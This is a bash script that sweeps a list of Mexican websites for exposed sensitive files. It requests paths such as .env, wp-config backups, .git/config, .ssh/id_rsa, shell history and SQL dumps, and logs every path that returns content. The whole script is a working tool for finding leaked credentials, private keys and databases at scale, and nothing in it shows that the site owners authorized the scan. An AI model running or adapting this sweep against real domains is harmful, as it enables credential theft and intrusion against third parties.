#!/bin/bash
# Final credential sweep - checks exposed file paths across Mexico domains
DOMAINS="/opt/huntr/targets/mexico-websites.txt"
OUT="/opt/sweep-results.txt"
> "$OUT"

PATHS=".git/config .env .env.local .env.production .env.backup wp-config.php wp-config.php.bak wp-config.php.old configuration.php config.php .htaccess phpinfo.php info.php .bash_history .bashrc .ssh/id_rsa .svn/entries .DS_Store web.config backup.sql dump.sql database.sql db.sql config/database.php config/database.yml app/config/parameters.yml wp-content/debug.log error_log vendor/composer/installed.json composer.json package.json .npmrc .env.example"

while IFS= read -r domain; do
  [[ -z "$domain" || "$domain" =~ ^# ]] && continue
  for path in $PATHS; do
    result=$(curl -skL -o /dev/null -w "%{http_code}|%{size_download}" --max-time 8 "https://$domain/$path" 2>/dev/null)
    code=$(echo "$result" | cut -d'|' -f1)
    size=$(echo "$result" | cut -d'|' -f2)
    if [ "$code" = "200" ] && [ "$size" -gt 50 ]; then
      echo "HIT|$domain|/$path|$code|${size}B" | tee -a "$OUT"
    fi
  done
done < "$DOMAINS"
echo "=== SWEEP COMPLETE: $(wc -l < "$OUT") hits ==="